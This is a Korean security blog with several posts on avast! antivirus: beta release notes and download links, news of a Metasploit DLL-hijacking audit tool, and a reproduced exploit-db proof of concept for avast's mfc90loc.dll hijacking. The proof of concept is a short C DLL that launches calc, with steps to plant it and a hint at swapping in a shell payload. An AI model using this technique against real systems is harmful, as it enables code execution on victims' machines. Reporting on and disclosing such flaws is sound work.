어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

•무료 제품: http://files.avast.com/files/beta/5.0.661/setup_av_free.exe
• 프로 제품: http://files.avast.com/files/beta/5.0.661/setup_av_pro.exe
• 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.661/setup_ais.exe

기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.

어베스트! V5.0.661 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

• 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
• 파일 시스템 방어 상태에서 사용자 인터페이스 문제점 해결 
• 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
• 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
• Urdu(우르두 어, 파키스탄 공용어) 언어 추가

참고로, 어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

• 어베스트! 서비스가 사자리는 문제점 해결
• 행동방어: 안정성 문제 해결(aswSP.sys)
• 어베스트! 샌드박스에서 안정서 및 성능 향상
• 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
• 업데이트 속도 향상
• IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
• IS: 새로운 안티스팸 엔진으로 업그레이드
• GUI에서 일부 사항 변경 및 버그 수정
• 스크린 리더 지원 향상
• 언어 추가:  덴마크어, 헤브류어


출 처: http://forum.avast.com/index.php?topic=63151.0

감사합니다.


PS: 최근 발견된 DLL Hijacking 취약점이 해결되었습니다.

끝.

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

    이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

    •무료 제품: http://files.avast.com/files/beta/5.0.656/setup_av_free.exe
    • 프로 제품: http://files.avast.com/files/beta/5.0.656/setup_av_pro.exe
    • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.656/setup_ais.exe

    기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


    어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

    • 어베스트! 서비스가 사자리는 문제점 해결
    • 행동방어: 안정성 문제 해결(aswSP.sys)
    • 어베스트! 샌드박스에서 안정서 및 성능 향상
    • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
    • 업데이트 속도 향상
    • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
    • IS: 새로운 안티스팸 엔진으로 업그레이드
    • GUI에서 일부 사항 변경 및 버그 수정
    • 스크린 리더 지원 향상
    • 언어 추가:  덴마크어, 헤브류어


    출 처: http://forum.avast.com/index.php?topic=63151.0

    감사합니다.


    PS: 최근 발견된 DLL Hijacking 취약점에 대해서는 아직 언급되지 않은 상태입니다.

    끝.
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      이번 주에 새롭게 출현한, 새롭다기 보다는 새롭게 다시 선보이는 DLL Hijacking 취약점에 대해서 언급한 적이 있습니다만, 사태가 기하급수적으로 커질 조짐을 보이고 있습니다. 아래 자료는 무료백신으로 인기있는 어베스트! 안티바이러스 제품에서도 DLL Hijacking 취약점이 있다는 자료입니다.


      하여튼, 지금 외국에서는 DLL Hijacking 취약점을 가진 소프트웨어에 대한 비공식적인 목록이 공개되고, 계속 추가되고 있는 실정입니다. 이에 대한 자세한 사항은 아래 링크를 참고하시기 바랍니다.


      이제 새롭게 소개할 내용은 바로 DLL Hijacking 취약점을 찾아 낼 수 있는 해킹 툴이 출현했다는 소식입니다.

      이 해킹 툴은 Metasploit 이라는 사이트에서 공개되었으며, 컴퓨터에 대한 충분한 지식이 없는 사용자라 하더라도 손쉽게 DLL Hijacking 취약점이 있는지 알 수 있습니다.


      또한, 이러한 해킹 툴의 출현으로 인해 다양한 변종 악성 프로그램이 나타날 가능성이 높아집니다. 따라서, 취약점이 있는 소프트웨어 벤더들은 빠른 시일 내에 문제점을 해결한 버전을 출시해야 하며, 마이크로소프트도 또한 마찬가지입니다.

      참고로, 이 툴을 사용할 경우에는 컴퓨터에 설치된 안티바이러스 제품을 일시적으로 중지(실시간 감시 중지)시켜야 제대로 동작합니다.

      감사합니다.


      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.

        DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.


        하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.

        # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
        # Date: 25/08/2010
        # Author: Bruno Filipe (diwr) http://digitalacropolis.us
        # Software Link: http://www.avast.com <http://www.bsplayer.org>
        # Version: <= 5.0.594
        # Tested on: WinXP SP2, WinXP SP3
        # Thx TheLeader ;)
        #
        ----------------------------------------------------------------------------------------------------------
        # This should work with avast license files (.avastlic)
        # 1. gcc dllmain.c -o mfc90loc.dll
        # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
        anything.avastlic)
        # 3. You can generate a msfpayload DLL and spawn a shell, for example.
        #
        ----------------------------------------------------------------------------------------------------------

        #include <windows.h>

        int main()
        {
        WinExec("calc", SW_NORMAL);
        exit(0);
        return 0;
        }

        BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
        {
        main();
        return 0;
        }

        하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.

        감사합니다.

        출처: http://www.exploit-db.com/exploits/14743/


        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus


          Web Analytics Blogs Directory